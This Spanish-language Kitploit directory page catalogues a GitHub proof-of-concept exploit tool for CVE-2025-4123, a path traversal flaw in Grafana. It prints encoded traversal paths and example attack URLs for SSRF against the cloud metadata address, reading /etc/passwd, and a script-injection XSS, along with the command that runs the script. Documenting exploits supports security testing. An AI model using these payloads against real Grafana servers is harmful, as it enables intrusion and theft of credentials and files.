Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-4123-Exploit-Tool-Grafana- — CVE-2025-4123 - Herramienta de Grafana | Kitploit
Herramientas/GitHubGitHub/ynsmroztas/cve-2025-4123-exploit-tool-grafana-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubynsmroztas/cve-2025-4123-exploit-tool-grafana-

CVE-2025-4123-Exploit-Tool-Grafana-

CVE-2025-4123 - Herramienta de Grafana

Ver Repositorio
326hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-4123 - Exploit de Path Traversal en Grafana

Desarrollado por mitsec

Esta es una herramienta de explotación de prueba de concepto (PoC) para CVE-2025-4123, una vulnerabilidad crítica de path traversal en el endpoint /public de Grafana. El exploit permite:

  • ✅ Server-Side Request Forgery (SSRF)
  • ✅ Local File Inclusion (LFI)
  • ✅ Open Redirect
  • ✅ Cross-Site Scripting (XSS)

🔥 Afectado

Instancias de Grafana con el endpoint /public/ que manejan incorrectamente rutas codificadas como:

root@kitploit:~
/public/..%2F%5coast.pro%2F%3f%2F..%2F..

🚀 Uso

root@kitploit:~
python3 cve_2025_4123_exploit_mitsec_final.py

Luego selecciona el modo deseado:

  1. SSRF - Servicios internos como 169.254.169.254
  • LFI - Leer archivos como /etc/passwd
  • Open Redirect - Redirigir a dominios externos
  • XSS - Inyección de JavaScript en la ruta pública

  • 🧪 Ejemplo

    root@kitploit:~
    [*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
    [*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
    [*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
    

    📄 Descargo de responsabilidad

    Este código se proporciona únicamente con fines educativos y de pruebas autorizadas. El uso no autorizado contra sistemas sin consentimiento es ilegal.


    ✍️ Autor

    • mitsec
    Descargar herramienta